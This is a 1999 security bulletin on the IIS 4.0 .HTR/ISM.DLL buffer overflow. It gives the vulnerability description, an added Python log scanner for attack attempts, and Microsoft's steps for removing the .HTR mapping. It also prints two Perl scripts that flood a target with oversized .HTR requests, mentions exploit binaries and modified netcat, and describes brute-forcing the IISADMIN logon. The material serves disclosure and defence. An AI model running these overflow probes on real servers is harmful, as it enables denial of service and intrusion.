
NT SECURITY NEWS  8/3/99



NT SECURITY - .HTR Vulnerability in IIS

Reported June 8,1999 by eEYE Digital Security Team

VERSIONS AFFECTED
  • Internet Information Server 4.0
  • Peer Web Services

DESCRIPTION

IIS is subject to a buffer overflow condition that allows an intruder to gain control of the remote machine.
 
According to eEYE's bulletin,
 
"IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers."

It is worth noting that Peer Web Services is also vulnerable to the overflow, since it ships the same ISM.DLL. In addition to the overflow, the IISADMIN interface may be accessed even when its permissions are set to allow only the localhost to connect. Requesting a URL similar to /scripts/iisadmin/ism.dll?http/dir presents a logon dialog against which an intruder can attempt to brute-force guess an account name and password.
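As an added example (not part of the original advisory or of eEYE's code), the following Python script scans constructed IIS W3C extended log lines for the two conditions described above: an .HTR request with an abnormally long path, and a request for ism.dll from any address other than the localhost. The field names follow the W3C extended format; the length threshold and the sample lines are assumptions made for the example.

```python
from urllib.parse import unquote

# Constructed sample of IIS W3C extended log lines (not real traffic).
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-06-22 10:01:02 10.0.0.5 GET /default.htm - 200
1999-06-22 10:01:09 10.0.0.5 GET /iisadmpwd/achg.htr - 200
1999-06-22 10:02:17 192.0.2.77 GET /{} - 500
1999-06-22 10:03:40 192.0.2.77 GET /scripts/iisadmin/ism.dll http/dir 401
1999-06-22 10:04:01 127.0.0.1 GET /scripts/iisadmin/ism.dll http/dir 200
""".format("A" * 3000 + ".htr")

# Assumption: no legitimate .HTR path on the server is anywhere near this long;
# the published probes use names of 2500 bytes and more.
HTR_LENGTH_THRESHOLD = 1024


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def classify(entry):
    """Return a verdict string for a suspicious entry, or None if it looks benign."""
    stem = unquote(entry.get("cs-uri-stem", "")).lower()
    if stem.endswith(".htr") and len(stem) > HTR_LENGTH_THRESHOLD:
        return "htr-overflow-attempt"
    # IISADMIN is meant to be reachable from the localhost only.
    if stem.endswith("/ism.dll") and entry.get("c-ip") != "127.0.0.1":
        return "iisadmin-remote-access"
    return None


def find_suspicious(text):
    """Return (client ip, verdict, status) for every flagged log entry."""
    hits = []
    for entry in parse_w3c(text):
        verdict = classify(entry)
        if verdict:
            hits.append((entry["c-ip"], verdict, entry["sc-status"]))
    return hits
```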

DEMONSTRATION CODE

eEYE released some code that demonstrates the exploit. You'll need to compile the code, since it's in assembler format. Here's an executable version of the compiled code, and here are modified versions of netcat, one of which runs on port 80 and the other on port 99. And here's some C-based exploit code that runs on UNIX-based systems.

In addition, Ryan Permeh published a working Perl-based exploit as follows:

#!/usr/bin/perl
# props to the absu crew
use strict;
use warnings;
use Net::Telnet;

# One connection per request: GET /AAAA...A.htr with the name length stepped
# from 2500 to 3499 bytes. The target host name is the first argument.
for (my $i = 2500; $i < 3500; $i++) {
    my $obj = Net::Telnet->new(Host => $ARGV[0], Port => 80);
    my $cmd = "GET /" . 'A' x $i . ".htr HTTP/1.0\n";
    print "$cmd\n";
    $obj->print($cmd);
    $obj->close;
}

However, Randal Schwartz points out that it can be done another way:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

# Same probe using LWP::Simple instead of a raw connection; the length
# counter is printed to STDERR on each iteration.
for (my $i = 2500; $i <= 3500; $i++) {
    warn "$i\n";
    get "http://$ARGV[0]/" . ('a' x $i) . ".htr";
}

Greg Hoglund also wrote some nifty C code that shows how to create a package to deliver a payload into the IIS server.

 

VENDOR COMMENTS

Microsoft has released a bulletin regarding this matter and has subsequently issued a fix for IIS to correct the problem. Be sure to read Support Online article Q234905.

You can also modify the configuration of your IIS system to mitigate the vulnerability.

Microsoft highly recommends that customers disable the script mapping for .HTR files as follows:

From the desktop, start the Internet Service Manager by clicking Start | Programs | Windows NT 4.0 Option Pack | Microsoft Internet Information Server | Internet Service Manager.

* Double-click "Internet Information Server".
* Right-click on the computer name and select Properties.
* In the Master Properties drop-down box, select "WWW Service", then click the "Edit" button.
* Click the "Home Directory" tab, then click the "Configuration" button.
* Highlight the line in the extension mappings that contains ".HTR", then click the "Remove" button.
* Respond "Yes" to "Remove selected script mapping?", click OK three times, then close the Internet Service Manager.

CREDITS
Discovered by
eEYE Digital Security Team
Posted here at The NT Shop on June 22, 1999



Copyright (c) 1995-1999, M.E. - ALL RIGHTS RESERVED